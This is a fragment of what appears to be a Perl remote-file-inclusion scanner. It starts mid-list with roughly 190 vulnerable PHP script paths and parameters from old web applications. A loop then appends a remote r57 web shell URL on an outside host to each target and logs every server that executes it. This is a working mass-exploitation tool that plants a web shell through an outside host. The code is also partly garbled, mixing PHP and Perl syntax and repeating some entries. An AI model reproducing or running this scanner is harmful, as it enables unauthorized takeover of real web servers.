$rfi239="pick.php?theme_path=";
$rfi240="power_search.php?theme_path=";
$rfi241="rating.php?theme_path=";
$rfi242="register.php?theme_path=";
$rfi243="review.php?theme_path=";
$rfi244="rss.php?theme_path=";
$rfi245="search.php?theme_path=";
$rfi246="send_pwd.php?theme_path=";
$rfi247="sendmail.php?theme_path=";
$rfi248="tell_friend.php?theme_path=";
$rfi249="top_rated.php?theme_path=";
$rfi250="user_detail.php?theme_path=";
$rfi251="user_search.php?theme_path=";
$rfi252="invoice.php?base_path=";
$rfi253="cgi-bin//classes/adodbt/sql.php?classes_dir=";
$rfi254="cgi-bin/install/index.php?G_PATH=";
$rfi255="cgi-bin/include/print_category.php?dir=";
$rfi256="includes/class_template.php?quezza_root_path=";
$rfi257="bazar/classified_right.php?language_dir=";
$rfi258="classified_right.php?language_dir=";
$rfi259="phpBazar/classified_right.php?language_dir=";
$rfi260="chat/messagesL.php3?cmd=";
$rfi261="phpMyChat/chat/messagesL.php3?cmd=";
$rfi262="bbs/include/write.php?dir=";
$rfi263="visitorupload.php?cmd=";
$rfi264="modules/center/admin/accounts/process.php?module_path]=";
$rfi265="index.php?template=";
$rfi266="armygame.php?libpath=";
$rfi267="lire.php?rub=";
$rfi268="pathofhostadmin/?page=";
$rfi269="apa_phpinclude.inc.php?apa_module_basedir=";
$rfi270="index.php?req_path=";
$rfi271="research/boards/encapsbb-0.3.2_fixed/index_header.php?root=";
$rfi272="Farsi1/index.php?archive=";
$rfi273="index.php?archive=";
$rfi274="show_archives.php?template=";
$rfi275="forum/include/common.php?pun_root=";
$rfi276="pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=";
$rfi277="vuln.php?=";
$rfi278="cgi-bin//include/write.php?dir=";
$rfi279="admin/common.inc.php?basepath=";
$rfi280="pm/lib.inc.php?sfx=";
$rfi281="pm/lib.inc.php?pm_path=";
$rfi282="artmedic-kleinanzeigen-path/index.php?id=";
$rfi283="osticket/include/main.php?include_dir=";
$rfi284="include/main.php?config[search_disp]=include_dir=";
$rfi285="phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=";
$rfi286="quick_reply.php?phpbb_root_path=";
$rfi287="zboard/include/write.php?dir=";
$rfi288="admin/plog-admin-functions.php?configbasedir=";
$rfi289="content.php?content=";
$rfi290="q-news.php?id=";
$rfi291="_conf/core/common-tpl-vars.php?confdir=";
$rfi292="votebox.php?VoteBoxPath=";
$rfi293="al_initialize.php?alpath=";
$rfi294="include/db.php?GLOBALS[rootdp]=";
$rfi295="modules/news/archivednews.php?GLOBALS[language_home]=";
$rfi296="protection.php?siteurl=";
$rfi297="modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=";
$rfi298="index2.php?includes_dir=";
$rfi299="classes.php?LOCAL_PATH=";
$rfi300="extensions/moblog/moblog_lib.php?basedir=";
$rfi301="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$rfi302="phpWebLog/include/init.inc.php?G_PATH=";
$rfi303="admin/objects.inc.php4?Server=";
$rfi304="trg_news30/trgnews/install/article.php?dir=";
$rfi305="block.php?Include=";
$rfi306="arpuivo.php?data=";
$rfi307="setup/index.php?GALLERY_BASEDIR=";
$rfi308="include/help.php?base=";
$rfi309="index.php?[Home]=";
$rfi310="block.php?Include=";
$rfi311="examples/phonebook.php?page=";
$rfi312="PHPNews/auth.php?path=";
$rfi313="include/print_category.php?dir=";
$rfi314="skin/zero_vote/login.php?dir=";
$rfi315="skin/zero_vote/setup.php?dir=";
$rfi316="skin/zero_vote/ask_password.php?dir=";
$rfi317="gui/include/sql.php?include_path=";
$rfi318="webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=";
$rfi319="email.php?login=cer_skin=";
$rfi320="PhotoGal/ops/gals.php?news_file=";
$rfi321="index.php?custom=";
$rfi322="loginout.php?cutepath=";
$rfi323="oneadmin/config.php?path[docroot]=";
$rfi324="xcomic/initialize.php?xcomicRootPath=";
$rfi325="skin/zero_vote/setup.php?dir=";
$rfi326="skin/zero_vote/error.php? dir=";
$rfi327="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$rfi328="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$rfi329="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$rfi330="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$rfi331="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$rfi332="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$rfi333="src/index_overview.inc.php?config[path_src_include]=";
$rfi334="src/index_leftnavbar.inc.php?config[path_src_include]=";
$rfi335="src/index_image.inc.php?config[path_src_include]=";
$rfi336="src/image-gd.class.php?config[path_src_include]=";
$rfi337="src/image.class.php?config[path_src_include]=";
$rfi338="src/album.class.php?config[path_src_include]=";
$rfi339="src/show_random.inc.php?config[path_src_include]=";
$rfi340="src/main.inc.php?config[path_src_include]=";
$rfi341="src/index_passwd-admin.inc.php?config[path_admin_include]=";
$rfi342="yappa-ng/src/index_overview.inc.php?config[path_src_include]=";
$rfi343="admin_modules/admin_module_captions.inc.php?config[path_src_include]=";
$rfi344="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=";
$rfi345="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=";
$rfi346="admin_modules/admin_module_edit.inc.php?config[path_src_include]=";
$rfi347="admin_modules/admin_module_delimage.inc.php?config[path_src_include]=";
$rfi348="admin_modules/admin_module_deldir.inc.php?config[path_src_include]=";
$rfi349="src/index_overview.inc.php?config[path_src_include]=";
$rfi350="src/image-gd.class.php?config[path_src_include]=";
$rfi351="src/image.class.php?config[image_module]=";
$rfi352="src/album.class.php?config[path_src_include]=";
$rfi353="src/show_random.inc.php?config[path_src_include]=";
$rfi353="src/main.inc.php?config[path_src_include]=";
$rfi354="includes/db_adodb.php?baseDir=";
$rfi355="includes/db_connect.php?baseDir=";
$rfi356="includes/session.php?baseDir=";
$rfi357="modules/projects/gantt.php?dPconfig[root_dir]=";
$rfi358="modules/projects/gantt2.php?dPconfig[root_dir]=";
$rfi359="modules/projects/vw_files.php?dPconfig[root_dir]=";
$rfi360="modules/admin/vw_usr_roles.php?baseDir=";
$rfi361="modules/public/calendar.php?baseDir=";
$rfi362="modules/public/date_format.php?baseDir=";
$rfi363="modules/tasks/gantt.php?baseDir=";
$rfi364="mantis/login_page.php?g_meta_include_file=";
$rfi365="phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY=";
$rfi366="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi367="dotproject/modules/files/index_table.php?root_dir=";
$rfi368="nukebrowser.php?filnavn=";
$rfi369="bug_sponsorship_list_view_inc.php?t_core_path=";
$rfi370="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR=";
$rfi372="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi373="includes/calendar.php?phpc_root_path=";
$rfi374="includes/setup.php?phpc_root_path=";
$rfi375="phpBB/admin/admin_styles.php?mode=";
$rfi376="aMember/plugins/db/mysql/mysql.inc.php?config=";
$rfi377="admin/lang.php?CMS_ADMIN_PAGE=";
$rfi378="inc/pipe.php?HCL_path=";
$rfi379="include/write.php?dir=";
$rfi380="becommunity/community/index.php?pageurl=";
$rfi381="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi382="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi383="modules/agendax/addevent.inc.php?agendax_path=";
$rfi384="shoutbox/expanded.php?conf=";
$rfi385="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi386="index.php?page=";
$rfi387="index.php?pag=";
$rfi388="index.php?include=";
$rfi389="index.php?content=";
$rfi390="index.php?cont=";
$rfi391="index.php?c=";
$rfi392="modules/My_eGallery/index.php?basepath=";
$rfi393="modules/newbb_plus/class/forumpollrenderer.php?bbPath=";
$rfi394="journal.php?m=";
$rfi395="index.php?m=";
$rfi396="links.php?c=";
$rfi397="forums.php?m=";
$rfi398="list.php?c=";
$rfi399="user.php?xoops_redirect=";
$rfi400="index.php?id=";
$rfi401="r.php?url=";
$rfi402="CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]=";
$rfi403="inc/formmail.inc.php?script_root=";
$rfi404="include/init.inc.php?G_PATH=";
$rfi405="backend/addons/links/index.php?PATH=";
$rfi406="modules/newbb_plus/class/class.forumposts.php?bbPath[path]=";
$rfi407="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=";
$rfi408="protection.php?siteurl=";
$rfi409="htmltonuke.php?filnavn=";
$rfi410="mail_autocheck.php?pm_path=";
$rfi411="index.php?p=";
$rfi412="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi413="e107/e107_handlers/secure_img_render.php?p=";
$rfi414="include/new-visitor.inc.php?lvc_include_dir=";
$rfi415="community/modules/agendax/addevent.inc.php?agendax_path=";
$rfi416="library/editor/editor.php?root=";
$rfi417="library/lib.php?root=";
$rfi418="zentrack/index.php?configFile=";
$rfi419="pivot/modules/module_db.php?pivot_path=";
$rfi420="myPHPCalendar/admin.php?cal_dir=";
$rfi421="index.php/main.php?x=";
$rfi422="os/pointer.php?url=";
$rfi423="p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM=";
$rfi424="db.php?path_local=";
$rfi425="phpGedView/individual.php?PGV_BASE_DIRECTORY=";
$rfi426="index.php?kietu[url_hit]=";
$rfi427="phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=";
$rfi428="Sources/Packages.php?sourcedir=";
$rfi429="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$rfi430="cgi-bin//gadgets/Blog/BlogModel.php?path=";

$int = $values[ rand(4) ];
for($int=1;$int<430;$int++){
@cmdgif="http://usuarios.lycos.es/poizonbox/r57.txt?";
#Seu Script de Teste.
$lol="rfi";
$asd=$lol.$int;
$url2="http://".$host."/".$$asd."@cmdgif?";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);

if ($response->is_success) {
if( $response->content =~ /r57shell/ && $response->content =~ /by/ ){
open(FILE,">>file.txt");
print FILE "$url2\n";
close(FILE);
print "$url2 is vulnerable..\n";
}}
}
}